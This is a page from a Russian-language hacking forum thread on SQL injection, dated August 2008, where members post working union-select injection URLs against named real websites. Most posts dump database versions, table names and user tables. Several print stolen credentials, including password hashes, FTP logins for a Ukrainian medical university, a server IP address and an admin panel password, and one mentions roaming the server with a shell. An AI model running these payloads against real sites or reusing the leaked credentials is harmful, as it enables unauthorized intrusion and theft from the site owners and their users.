HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 626 из 1602 « Первая < 126526576616 622 623 624 625 626 627 628 629 630 6366767261126 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.08.2008, 13:46
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию
Довел инъекцию Fugitif.
Код:
 http://www.espacejavascript.com/script.php?id=-1' 
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,version(),5,6,/*
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,table_name,5,6
+from+infomation_schema.tables/*
Выводятся все таблицы,я выбрал site_admins_annu. Колнки: login,pass.
login: G1Script
pass:931af583573227f0220bc568c65ce104
 
Ответить с цитированием

  #2  
Старый 17.08.2008, 17:53
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,email,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*
ничего полезного кроме мыл не нашел
 
Ответить с цитированием

  #3  
Старый 17.08.2008, 18:50
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию
ALL4HOSTING


http://www.all4hosting.ru/

таблы

Цитата:
Сообщение от Dimi4  
http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('Content','D99_CMD','D99_Tmp','dtproperties', 'foob','forum_data','forum_mails','forum_theme','f orum_title','idClient','kill_kk','Links','Log','Mailer','Menu','Meta',' MetaLinks','News','property','sysconstraints','sys segments','t','t_jiaozhu','te222','TreeList_Tmp'))--
Более менее интересной показалась idClient

Но там всего два юзера, и то западло какоето:
Цитата:
http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+COLUMN_NAME+ FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=' idClient'+AND+COLUMN_NAME+NOT+IN+('idClient','logi n','pass','ip'))--
+
Цитата:
http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+login+FROM+i dClient)--
system_user:allforhosting
@@version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name():allforhosting
Последний раз редактировалось Dimi4; 24.08.2008 в 22:42..
 
Ответить с цитированием

  #4  
Старый 17.08.2008, 19:23
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию
http://www.davisvisitor.com/sub_hotels.php?id=9&city=-1+union+select+1,version(),3,4,5,6,7,8/*

version 4.0.16
 
Ответить с цитированием

  #5  
Старый 17.08.2008, 19:34
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию
http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),database(),4,5,6,user( ),8,9,0/*
version: MYSQL 4.1.22-standard
database: pollan_articles
user: pollan_article@localhost
 
Ответить с цитированием

Sql Inj
  #6  
Старый 17.08.2008, 20:30
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию Sql Inj
Palit.biz
Цитата:
http://www.palit.biz/main/vgapro.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,version()+limit+1,1/*
Combined.biz
Цитата:
http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6+from+mysql.user--
Plusline.org
Цитата:
http://www.plusline.org/article.php?id=99999+union+select+unhex(hex(versio n()))/*
Talk.biz
Цитата:
http://www.talk.biz/talk/cities.php?id=-1'+union+select+1,2,3,version(),5,6/*
Cyberthing.net
Цитата:
http://www.cyberthing.net/video-play.php?id=-1+union+select+1,concat_ws(0x3a,table_name),3,4,5, 6,7+from+information_schema.tables
Interprice.biz
Цитата:
http://interprice.biz/pricelist.php?cat=1&fcountry=&fregion=&fcity=&fupd ated=0&ftitle=99999999999%27+union+select+1,unhex( hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25/*
Ransomes-jacobsen.biz
Цитата:
http://www.ransomes-jacobsen.biz/rjl_website/product_details.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*
Talant.biz
Цитата:
http://www.talant.biz/news.php?id=-1'+union+select+1,2,3,unhex(hex(version())),5,6,7, 8,9,10/*
3 ver. by vital & jokester
Цитата:
http://www.saldovo-divadlo.cz/page.php?id=4+and+substring(version(),1,1)=3/*
http://www.host.ie/testimonials.php?id=8+and+substring(version(),1,1) =3/*
http://www.places.ge/GEO/sightseeings.php?id=2'+and+substring(version(),1,1 )=3/*
Последний раз редактировалось sabe; 17.08.2008 в 20:37..
 
Ответить с цитированием

  #7  
Старый 18.08.2008, 01:30
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840

Репутация: 35
Отправить сообщение для mister с помощью ICQ
По умолчанию
Код:
http://news.udaff.com
POST-инъект
Код:
http://news.udaff.com/index.php
cat=korresp&korrname='+union+select+1,concat_ws(0x3a,login,password),3+from+USERS+limit+0,1/*
inzzz:6af0088fc7c444ab185664fc4625b44a:bugaga
 
Ответить с цитированием

  #8  
Старый 18.08.2008, 02:18
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию
Немного о вине =)

Код:
http://www.dionysos-mereni.com/news.php?id=220+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+admintable/*
Табличку не подобрал =)
 
Ответить с цитированием

  #9  
Старый 18.08.2008, 04:30
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
Премного извинюсь, ибо в бояне есть http://odmu.edu.ua
Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить.

Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю...

http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам

osas:::Z5ESqlRtTrt7Y
anatomka:::Pgwl.XrN4bs1o
phosas:::KGt4CWj1zvBWc
osasod:::JO96GZfMHu0BU
adminweb:::MEDINedu
sopott:::M.NEksFkXBxfk
admfoto::WJc7OVOTQRkFs
userfoto::RsRvTv93
biophys:::gjtqJLxY0FDrM

ftp://217.146.249.35 <-тыкаем сюда
--------------------------------

пример: login: biophys pass: gjtqJLxY0FDrM
http://www.biophys.odmu.od.ua/


login: adminweb pass: MEDINedu
ftp://www.odmu.edu.ua/

http://www.odmu.edu.ua/_.php <-админка
Пароль: k.,bvfz ie,rf

С помощью шела путешествуем по серверу на котором висит все это чудо.
 
Ответить с цитированием

  #10  
Старый 18.08.2008, 09:52
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
 
Ответить с цитированием
Ответ
Страница 626 из 1602 « Первая < 126526576616 622 623 624 625 626 627 628 629 630 6366767261126 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ